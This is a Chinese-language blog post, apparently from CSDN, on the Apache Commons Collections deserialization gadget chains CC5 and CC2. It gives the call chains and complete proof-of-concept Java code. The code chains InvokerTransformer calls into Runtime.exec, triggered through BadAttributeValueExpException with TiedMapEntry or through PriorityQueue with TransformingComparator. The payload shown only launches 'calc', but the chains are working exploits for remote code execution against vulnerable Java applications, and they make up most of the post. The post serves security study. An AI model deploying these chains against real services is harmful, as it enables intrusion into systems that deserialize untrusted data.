java cc链5 cc链2

最新推荐文章于 2024-07-22 10:52:16 发布
最新推荐文章于 2024-07-22 10:52:16 发布
阅读量462 收藏 8
点赞数 6
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135660377
版权

java cc链5

BadAttributeValueExpException.readObject()
    TiedMapEntry.toString()
    
        LazyMap.get()
            ChainedTransformer.transform()
                ConstantTransformer.transform()
                InvokerTransformer.transform()
                    Method.invoke()
                        Class.getMethod()
                InvokerTransformer.transform()
                    Method.invoke()
                        Runtime.getRuntime()
                InvokerTransformer.transform()
                    Method.invoke()
                        Runtime.exec()

从链路分析,与cc1的区别在于调用方法的不同,也就是LazyMap.get

Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
        HashMap<Object,Object> map=new HashMap<>();
        Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
        lazymap.get("test");

相同的地方直接复制,调用TiedMapEntry.toString()方法,在BadAttributeValueExpException的readObject方法中调用了

 Object valObj = gf.get("val", null);
 val = valObj.toString();

通过反射修改val的值,使得val变为TiedMapEntry即可
最后的poc为

Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
        HashMap<Object,Object> map=new HashMap<>();
        Map<Object,Object> lazymap= LazyMap.decorate(map,chainedTransformer);
        TiedMapEntry aaa = new TiedMapEntry(lazymap, "aaa");
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,aaa);


        serialize(badAttributeValueExpException);
        unserialize("person.bin");

cc链2 调用链 和cc4类似,只是执行命令的方式不同,cc4是字节码加载,cc2是反射加载调用,poc如下

Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);

        TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
        PriorityQueue test = new PriorityQueue<>(transformingComparator);
//        test.add(1);
//        test.add(2);
        Class aClass = test.getClass();
        Field size = aClass.getDeclaredField("size");
        size.setAccessible(true);
        size.set(test,2);

//        serialize(test);
        unserialize("person.bin");
天下是个小趴菜
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Java安全 CC链2分析
Elite的博客
03-16 1147
CC2链适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类的readObject方法进行了修复,导致cc链1无法使用,故产生了cc链2,cc链2与cc链3相似,都使用了字节码的加载,并且后续的触发链也基本相同
【Web】Java反序列化之CC2——commons-collections4的新链之一
uuzeray的博客
03-01 555
而siftDownUsingComparator内部会调用构造方法传入的comparator的compare方法,此时我们只要令comparator为TransformingComparator即可完成利用链的调用。API 设计:commons-collections4 重新设计了 API,并且引入了一些新的功能和改进,同时也修复了一些旧版本中存在的 bug。安全性增强:commons-collections4 引入了更多的安全性措施,以防止常见的安全漏洞。最后调用了heapify方法。
Java安全(七) CC链1
WDWAGAAFGAGDADSA的博客
12-24 2312
Commons Collections 1的基本知识
Java反序列化之CC1链分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1链的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1链和那两种玩法
cc链2(小宇特详解)
小宇的web博客
02-19 3810
cc链2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc链1的区别 cc链2利用链中使用了动态字节码编程来构造poc cc链2没有使用反序列化漏洞 cc链利用流程 构造一个TestTemplatesImpl恶意类转成字节码,然后通过反射将恶意类的字节码注入到TemplatesImpl对象的_bytecodes属性(构造利用核心代码) 创建一个InvokerTransformer并传递一个newTransformer方法,然后将Invoker
java审计CC链1-7学习
superprintf的博客
01-06 852
[基础知识] CC链(apache common collections组件漏洞利用链) ysoserial java动态代理 Javassist动态编程 [分析] freebuf文章
Java安全研究——反序列化漏洞之CC2链
weixin_43889136的博客
05-10 1518
0x01
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4073
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
java安全-CC链1(小宇特详解)
小宇的web博客
01-29 2920
java安全-CC链1(小宇特详解) CC链的前提是序列化和反序列化 序列化需要两个条件 该类必须实现java.io.Serlalizable接口 该类的所有属性必须是可序列化的,如果⼀个属性是不可序列化的,则属性必须标明是短暂的。 比如:static,transient 修饰的变量不可被序列化 注意事项: 不能new 一个Runtime类 package com.CC1; public class Demo { public static void main(String[] arg
java代码审计之CC1链(一)
st3pby的博客
02-20 3778
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
TP2-CC
03-30
【标题】"TP2-CC"可能代表一个项目或任务的第二阶段,其中"CC"可能是项目的特定代码或缩写,但没有明确的信息来详细解释它的含义。在IT行业中,"TP"通常指的是"Test Plan"(测试计划)或者"Term Project"(学期项目...
cc.jar java开发工具包
06-22
cc.jar是java ssh开发工具包。
CC++中调用Java
12-04
自己整理的如何在CC++中调用Java的文档
CC150:CC150 问题的 Java 解决方案
06-21
2. **面向对象编程**:Java的面向对象特性允许我们将问题分解为可重用的类和对象。通过封装、继承和多态,我们可以构建复杂的问题解决方案。在CC150问题中,可能需要定义特定的类来表示问题的实体,或者创建抽象类或...
sub-funix-cc2
03-07
【标题】"sub-funix-cc2" 是一个与Unix操作系统和C...通过深入研究"sub-funix-cc2",开发者不仅可以掌握Unix系统编程和编译器构造的核心技能,还能了解到如何将这些技术与Java语言相结合,实现高效、可移植的解决方案。
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 423
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
最新发布
par@ish的博客
07-22 823
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 608
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网站验证:确保网络安全与信任的重要步骤
07-22 198
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
typedef struct cc改成java
06-06
In Java, you can define a similar structure using a class: ``` public class CC { // Define variables for the struct fields int field1; float field2; String field3; // Define a constructor for ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值